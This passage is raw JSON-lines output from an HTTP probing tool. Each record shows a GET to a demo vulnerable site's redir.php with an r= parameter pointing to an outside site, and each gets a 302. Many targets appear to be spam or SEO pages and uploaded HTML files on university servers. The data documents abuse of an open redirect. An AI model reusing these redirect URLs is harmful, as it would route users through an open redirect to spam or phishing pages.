\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:13.10889769Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1503/submission/original/1503-2487-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1503/submission/original/1503-2487-1-SM.html\",\"location\":\"http://publications.lnu.edu.ua/journals/files/journals/8/articles/1503/submission/original/1503-2487-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1503/submission/original/1503-2487-1-SM.html\",\"time\":\"350.333247ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:13.158783622Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1505/submission/original/1505-2490-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1505/submission/original/1505-2490-1-SM.html\",\"location\":\"http://publications.lnu.edu.ua/journals/files/journals/8/articles/1505/submission/original/1505-2490-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1505/submission/original/1505-2490-1-SM.html\",\"time\":\"351.808576ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:13.49386965Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1513/submission/original/1513-2511-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1513/submission/original/1513-2511-1-SM.html\",\"location\":\"http://publications.lnu.edu.ua/journals/files/journals/8/articles/1513/submission/original/1513-2511-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://publications.lnu.edu.ua/journals/files/journals/8/articles/1513/submission/original/1513-2511-1-SM.html\",\"time\":\"351.599975ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:14.326953572Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://pushpa-the-rise.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://pushpa-the-rise.blogspot.com\",\"location\":\"http://pushpa-the-rise.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://pushpa-the-rise.blogspot.com\",\"time\":\"351.744626ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:14.346111008Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://pushpa-the-rise.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://pushpa-the-rise.blogspot.com/\",\"location\":\"http://pushpa-the-rise.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://pushpa-the-rise.blogspot.com/\",\"time\":\"352.485845ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:14.411184409Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://pushpa-the-rise.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://pushpa-the-rise.blogspot.com/management.html\",\"location\":\"http://pushpa-the-rise.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://pushpa-the-rise.blogspot.com/management.html\",\"time\":\"355.849813ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:14.418131105Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://pva.cobach.edu.mx/app/upload/users/7/7438/my_files/joker15.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://pva.cobach.edu.mx/app/upload/users/7/7438/my_files/joker15.html\",\"location\":\"http://pva.cobach.edu.mx/app/upload/users/7/7438/my_files/joker15.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://pva.cobach.edu.mx/app/upload/users/7/7438/my_files/joker15.html\",\"time\":\"348.276866ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:14.736794441Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://randeczq.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://randeczq.blogspot.com/\",\"location\":\"http://randeczq.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://randeczq.blogspot.com/\",\"time\":\"348.205061ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:14.790779423Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://randewus.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://randewus.blogspot.com/\",\"location\":\"http://randewus.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://randewus.blogspot.com/\",\"time\":\"356.679182ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:14.80436413Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://rebej.abejor.org.br/files/journals/1/articles/1036/submission/1036-1-1983-1-2-20221007.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://rebej.abejor.org.br/files/journals/1/articles/1036/submission/1036-1-1983-1-2-20221007.html\",\"location\":\"http://rebej.abejor.org.br/files/journals/1/articles/1036/submission/1036-1-1983-1-2-20221007.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://rebej.abejor.org.br/files/journals/1/articles/1036/submission/1036-1-1983-1-2-20221007.html\",\"time\":\"354.97222ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:14.892109833Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://recenzjefilmowe.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://recenzjefilmowe.weebly.com\",\"location\":\"http://recenzjefilmowe.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://recenzjefilmowe.weebly.com\",\"time\":\"351.964651ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:14.904709966Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://recenzjefilmowe.weebly.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://recenzjefilmowe.weebly.com/\",\"location\":\"http://recenzjefilmowe.weebly.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://recenzjefilmowe.weebly.com/\",\"time\":\"342.367791ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:15.017024075Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://revistatema.facisa.edu.br/files/journals/1/articles/7368/submission/original/7368-52339-1-SM.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://revistatema.facisa.edu.br/files/journals/1/articles/7368/submission/original/7368-52339-1-SM.html\",\"location\":\"http://revistatema.facisa.edu.br/files/journals/1/articles/7368/submission/original/7368-52339-1-SM.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://revistatema.facisa.edu.br/files/journals/1/articles/7368/submission/original/7368-52339-1-SM.html\",\"time\":\"356.932497ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:15.054179915Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://roofingsheets2.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://roofingsheets2.blogspot.com/\",\"location\":\"http://roofingsheets2.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://roofingsheets2.blogspot.com/\",\"time\":\"348.479097ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:15.108277163Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://roofingsheets2.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://roofingsheets2.blogspot.com/management.html\",\"location\":\"http://roofingsheets2.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://roofingsheets2.blogspot.com/management.html\",\"time\":\"356.161963ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:15.165577569Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://sabteratera.xyz/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://sabteratera.xyz/\",\"location\":\"http://sabteratera.xyz/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://sabteratera.xyz/\",\"time\":\"338.825798ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:15.24336717Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://sagamingthai.net/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://sagamingthai.net/\",\"location\":\"http://sagamingthai.net/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://sagamingthai.net/\",\"time\":\"350.822674ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:15.32127474Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://saludmental.unicauca.edu.co/p/main/upload/users/2/25/my_files/joker11.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://saludmental.unicauca.edu.co/p/main/upload/users/2/25/my_files/joker11.html\",\"location\":\"http://saludmental.unicauca.edu.co/p/main/upload/users/2/25/my_files/joker11.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://saludmental.unicauca.edu.co/p/main/upload/users/2/25/my_files/joker11.html\",\"time\":\"356.428794ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:15.432779116Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://savijoco.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://savijoco.blogspot.com/\",\"location\":\"http://savijoco.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://savijoco.blogspot.com/\",\"time\":\"356.92223ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:18.576744111Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seavitalgummies.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seavitalgummies.com\",\"location\":\"http://seavitalgummies.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seavitalgummies.com\",\"time\":\"343.773301ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:18.790102202Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seocountry8.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seocountry8.blogspot.com/\",\"location\":\"http://seocountry8.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seocountry8.blogspot.com/\",\"time\":\"352.033367ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:18.835818676Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seocountry8.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seocountry8.blogspot.com/management.html\",\"location\":\"http://seocountry8.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seocountry8.blogspot.com/management.html\",\"time\":\"351.230945ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:18.887855685Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seocove8.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seocove8.blogspot.com/\",\"location\":\"http://seocove8.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seocove8.blogspot.com/\",\"time\":\"355.25665ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:19.282182219Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seocove8.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seocove8.blogspot.com/management.html\",\"location\":\"http://seocove8.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seocove8.blogspot.com/management.html\",\"time\":\"342.951407ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:19.684374418Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews006.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews006.blogspot.com/\",\"location\":\"http://seonews006.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews006.blogspot.com/\",\"time\":\"352.554218ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:19.724940481Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews006.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews006.blogspot.com/management.html\",\"location\":\"http://seonews006.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews006.blogspot.com/management.html\",\"time\":\"352.244517ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:19.890043205Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1106.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1106.blogspot.com/\",\"location\":\"http://seonews1106.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1106.blogspot.com/\",\"time\":\"348.516462ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:20.430794249Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1113.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1113.blogspot.com/\",\"location\":\"http://seonews1113.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1113.blogspot.com/\",\"time\":\"344.057079ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:20.473873288Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1114.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1114.blogspot.com/\",\"location\":\"http://seonews1114.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1114.blogspot.com/\",\"time\":\"349.03994ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:22.213642624Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews112228.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews112228.blogspot.com/\",\"location\":\"http://seonews112228.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews112228.blogspot.com/\",\"time\":\"354.691717ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:23.45197324Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews112228.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews112228.blogspot.com/management.html\",\"location\":\"http://seonews112228.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews112228.blogspot.com/management.html\",\"time\":\"340.806325ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:23.503762863Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1144.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1144.blogspot.com/management.html\",\"location\":\"http://seonews1144.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1144.blogspot.com/management.html\",\"time\":\"343.137521ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:23.848601214Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1163.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1163.blogspot.com/management.html\",\"location\":\"http://seonews1163.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1163.blogspot.com/management.html\",\"time\":\"352.426845ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:24.682145523Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1164.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1164.blogspot.com/management.html\",\"location\":\"http://seonews1164.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1164.blogspot.com/management.html\",\"time\":\"352.882788ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:30:24.709990541Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1172.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1172.blogspot.com/management.html\",\"location\":\"http://seonews1172.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir